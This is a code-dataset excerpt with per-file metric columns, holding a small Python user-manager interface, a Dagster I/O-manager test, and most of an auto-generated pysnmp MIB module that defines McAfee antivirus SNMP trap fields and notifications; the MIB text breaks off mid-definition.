| 0.527778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132653
| 98
| 5
| 49
| 19.6
| 0.847059
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
25cb790c30d04b5e11e3652482e62d2058f3b7f1
| 174
|
py
|
Python
|
Services/IUserManager.py
|
nafis-sadik/flask-mvc-example
|
061f0f827a62a91495694db2b600aa3fe7b3b165
|
[
"MIT"
] | null | null | null |
Services/IUserManager.py
|
nafis-sadik/flask-mvc-example
|
061f0f827a62a91495694db2b600aa3fe7b3b165
|
[
"MIT"
] | null | null | null |
Services/IUserManager.py
|
nafis-sadik/flask-mvc-example
|
061f0f827a62a91495694db2b600aa3fe7b3b165
|
[
"MIT"
] | null | null | null |
class IUserManager:
def logIn(self, userId, password):
raise NotImplementedError
def SignUp(self, userId, password):
raise NotImplementedError
| 24.857143
| 40
| 0.678161
| 16
| 174
| 7.375
| 0.625
| 0.169492
| 0.305085
| 0.389831
| 0.711864
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.258621
| 174
| 6
| 41
| 29
| 0.914729
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.4
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
25ec2ed065760c5e23e3425a3497654c131f655e
| 182
|
py
|
Python
|
examples/docs_snippets/docs_snippets_tests/concepts_tests/io_management_tests/test_custom_io_manager.py
|
withshubh/dagster
|
ff4a0db53e126f44097a337eecef54988cc718ef
|
[
"Apache-2.0"
] | null | null | null |
examples/docs_snippets/docs_snippets_tests/concepts_tests/io_management_tests/test_custom_io_manager.py
|
withshubh/dagster
|
ff4a0db53e126f44097a337eecef54988cc718ef
|
[
"Apache-2.0"
] | null | null | null |
examples/docs_snippets/docs_snippets_tests/concepts_tests/io_management_tests/test_custom_io_manager.py
|
withshubh/dagster
|
ff4a0db53e126f44097a337eecef54988cc718ef
|
[
"Apache-2.0"
] | null | null | null |
from dagster import execute_pipeline
from docs_snippets.concepts.io_management.custom_io_manager import my_pipeline
def test_custom_io_manager():
execute_pipeline(my_pipeline)
| 26
| 78
| 0.862637
| 26
| 182
| 5.615385
| 0.576923
| 0.205479
| 0.205479
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093407
| 182
| 6
| 79
| 30.333333
| 0.884848
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d3232b92efbd0d5163d48e7a28a420e43dac3aa9
| 164,026
|
py
|
Python
|
pysnmp/TVD-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 11
|
2021-02-02T16:27:16.000Z
|
2021-08-31T06:22:49.000Z
|
pysnmp/TVD-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 75
|
2021-02-24T17:30:31.000Z
|
2021-12-08T00:01:18.000Z
|
pysnmp/TVD-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module TVD-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/TVD-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 21:20:44 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueSizeConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ConstraintsIntersection")
naiTrapProblemResolution, naiTrapLongDescription, naiTrapAgent, naiTrapSourceDNSName, naiTrapDiagID, naiTrapTargetDNSName, naiTrapAgentVersion, naiTrapURL, naiTrapShortDescription, nai, naiTrapSeverity = mibBuilder.importSymbols("NAI-MIB", "naiTrapProblemResolution", "naiTrapLongDescription", "naiTrapAgent", "naiTrapSourceDNSName", "naiTrapDiagID", "naiTrapTargetDNSName", "naiTrapAgentVersion", "naiTrapURL", "naiTrapShortDescription", "nai", "naiTrapSeverity")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
iso, TimeTicks, Unsigned32, IpAddress, NotificationType, Integer32, ModuleIdentity, Gauge32, Bits, Counter64, MibIdentifier, NotificationType, enterprises, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter32, ObjectIdentity = mibBuilder.importSymbols("SNMPv2-SMI", "iso", "TimeTicks", "Unsigned32", "IpAddress", "NotificationType", "Integer32", "ModuleIdentity", "Gauge32", "Bits", "Counter64", "MibIdentifier", "NotificationType", "enterprises", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter32", "ObjectIdentity")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
mcafee = MibIdentifier((1, 3, 6, 1, 4, 1, 3401, 12))
mcafeeTVDTrap = MibIdentifier((1, 3, 6, 1, 4, 1, 3401, 12, 0))
mcafeeStandardTrapField = MibIdentifier((1, 3, 6, 1, 4, 1, 3401, 12, 1))
mcafee_TRAPID = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_TRAPID.setStatus('mandatory')
mcafee_ENGINEVERSION = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_ENGINEVERSION.setStatus('mandatory')
mcafee_DATVERSION = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 3), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_DATVERSION.setStatus('mandatory')
mcafee_ENGINESTATUS = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_ENGINESTATUS.setStatus('mandatory')
mcafee_VIRUSNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_VIRUSNAME.setStatus('mandatory')
mcafee_VIRUSTYPE = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 6), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_VIRUSTYPE.setStatus('mandatory')
mcafee_FILENAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 7), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_FILENAME.setStatus('mandatory')
mcafee_USERNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 8), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_USERNAME.setStatus('mandatory')
mcafee_OS = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 9), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_OS.setStatus('mandatory')
mcafee_PROCESSORSERIAL = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 10), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_PROCESSORSERIAL.setStatus('mandatory')
mcafee_TASKNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 11), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_TASKNAME.setStatus('mandatory')
mcafee_NUMVIRS = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NUMVIRS.setStatus('mandatory')
mcafee_NUMCLEANED = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 16), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NUMCLEANED.setStatus('mandatory')
mcafee_NUMDELETED = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 17), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NUMDELETED.setStatus('mandatory')
mcafee_NUMQUARANTINED = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NUMQUARANTINED.setStatus('mandatory')
mcafee_SCANRETURNCODE = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_SCANRETURNCODE.setStatus('mandatory')
mcafee_MAILFROMNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 30), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_MAILFROMNAME.setStatus('mandatory')
mcafee_MAILTONAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 31), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_MAILTONAME.setStatus('mandatory')
mcafee_MAILCCNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 32), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_MAILCCNAME.setStatus('mandatory')
mcafee_MAILSUBJECTLINE = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 33), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_MAILSUBJECTLINE.setStatus('optional')
mcafee_MAILIDENTIFIERINFO = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 34), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_MAILIDENTIFIERINFO.setStatus('optional')
mcafee_NOTEID = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 35), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NOTEID.setStatus('optional')
mcafee_NOTESSERVERNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 36), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NOTESSERVERNAME.setStatus('optional')
mcafee_NOTESDBNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 37), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_NOTESDBNAME.setStatus('optional')
mcafee_DOMAIN = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 38), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_DOMAIN.setStatus('optional')
mcafee_OBRULE = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 39), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_OBRULE.setStatus('optional')
mcafee_LANGUAGECODE = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 40), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_LANGUAGECODE.setStatus('optional')
mcafee_CLIENTCOMPUTER = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 41), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_CLIENTCOMPUTER.setStatus('optional')
mcafee_TSCLIENTID = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 42), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_TSCLIENTID.setStatus('optional')
mcafee_ACCESSPROCESSNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 43), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_ACCESSPROCESSNAME.setStatus('optional')
mcafee_EVENTNAME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 44), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_EVENTNAME.setStatus('optional')
mcafee_GMTTIME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 45), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_GMTTIME.setStatus('optional')
mcafee_TIME = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 46), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_TIME.setStatus('optional')
mcafee_SOURCEIP = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 47), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_SOURCEIP.setStatus('optional')
mcafee_TARGETIP = MibScalar((1, 3, 6, 1, 4, 1, 3401, 12, 1, 48), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mcafee_TARGETIP.setStatus('optional')
mcafee_EVENT_TEST_TRAP = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,9999)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_VIRFOUND = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1024)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_FILECLEANED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1025)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_FILECLEANERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1026)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_FILEDELETED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1027)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_FILEDELETEERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1028)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_FILEEXCLUDING = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1029)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", 